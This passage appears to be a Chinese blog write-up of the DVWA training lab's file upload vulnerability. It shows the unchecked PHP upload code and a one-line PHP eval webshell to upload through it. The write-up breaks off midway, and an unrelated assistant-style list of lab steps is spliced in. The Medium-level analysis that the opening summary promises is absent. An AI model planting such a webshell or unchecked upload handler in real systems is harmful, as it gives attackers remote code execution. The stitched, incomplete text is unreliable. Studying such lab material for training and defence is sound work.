DVWA之File Upload(文件上传漏洞)

该博客详细分析了DVWA中LOW和Medium级别的文件上传漏洞,包括服务器端核心代码、漏洞利用方法以及提权技巧。在LOW级别,由于缺乏文件类型和内容的检查,攻击者能上传木马获取webshell。Medium级别虽然限制了文件类型和大小,但通过文件包含和文件名截断等手段仍能绕过防护。
摘要由CSDN通过智能技术生成

      由于对上传文件的类型、内容没有进行严格的过滤、检查,使得攻击者可以通过上传木马获取服务器的webshell权限,因此文件上传漏洞带来的危害常常是毁灭性的。

      下面对不同级别的代码进行分析。

一:LOW

1、服务器端核心代码

<?php 

if( isset( $_POST[ 'Upload' ] ) ) { 
    // Where are we going to be writing to? 
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/"; 
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] ); 

    // Can we move the file to the upload folder? 
    if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) { 
        // No 
        echo '<pre>Your image was not uploaded.</pre>'; 
    } 
    else { 
        // Yes! 
        echo "<pre>{$target_path} succesfully uploaded!</pre>"; 
    } 
} 

?>

        可以看到,服务器对上传文件的类型、内容没有做任何的检查、过滤,存在明显的文件上传漏洞,生成上传路径后,服务器会检查是否上传成功并返回相应提示信息。

        文件上传漏洞的利用是有限制条件的,首先当然是要能够成功上传木马文件,其次上传文件必须能够被执行,最后就是上传文件的路径必须可知。

 2、漏洞利用

(1)首先先上传一个一句话木马hack.php,参数名(一句话木马口令)为hack

<?php
@eval($_POST['hack'])
?>

上传成功,并且返回了上传路径

好的,我可以为您提供一些关于DVWAFile Upload模块的实验步骤。首先,您需要了解一下DVWA是什么。DVWA(Damn Vulnerable Web Application)是一个用于练习网络渗透测试技能的虚拟机环境,其中包含多个漏洞,可供练习和学习。其中就包括File Upload模块。 以下是一些关于DVWAFile Upload模块的实验步骤: 1. 首先,您需要在本地安装DVWA,并启动它。您可以使用XAMPP等工具来安装和启动DVWA。 2. 登录到DVWA并选择File Upload模块。 3. 选择一个文件并上传。您可以尝试上传一些不同类型的文件,如图片、文本文件、PDF等。 4. 观察上传后的结果。如果上传成功,您应该能够看到一个已上传的文件列表,并且您上传的文件应该显示在列表中。 5. 试着上传一些恶意文件,如包含恶意代码的文件。观察上传后的结果并尝试分析它们的影响。 6. 尝试绕过文件上传的限制。您可以尝试通过修改文件扩展名、使用特殊字符或修改HTTP报文来绕过文件类型和大小的限制。 7. 尝试利用文件上传漏洞进行攻击。您可以尝试上传一个包含Web Shell的文件,并尝试通过Web Shell来获取系统权限。 需要注意的是,您在进行实验时应该遵循合法的道德和法律标准,不得以任何非法或不道德的方式使用这些技术。同时,您应该在安全的环境中进行实验,以避免对其他人或组织的系统造成损害。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值